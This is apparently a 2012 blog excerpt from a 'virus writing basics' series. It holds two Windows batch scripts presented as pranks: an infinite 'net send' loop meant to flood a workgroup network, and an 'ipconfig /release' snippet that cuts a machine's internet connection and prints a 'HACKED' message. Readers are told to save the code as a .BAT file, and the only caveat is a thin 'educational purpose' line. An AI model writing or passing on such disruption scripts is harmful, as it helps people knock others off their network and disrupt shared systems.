Wednesday, 14 March 2012


 Flood your network

This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.



The below code will temporarily flood network once the user turns off his comp everything will be back to normal.



:CRASH

net send * WORKGROUP ENABLED

net send * WORKGROUP ENABLED

GOTO CRASH



Tuesday, 13 March 2012

How To Disable Internet Temproary

This is the virus writing basics section. Today we are going to show you how to disable Internet. This is demonstrated using Batch/ Dos Programing.


ipconfig /release


echo You Internet Been HACKED!




Just copy the above code in to a notepad file and save it as anything
.BAT. This will temporarily disable your Internet. This  is only for educational purpose..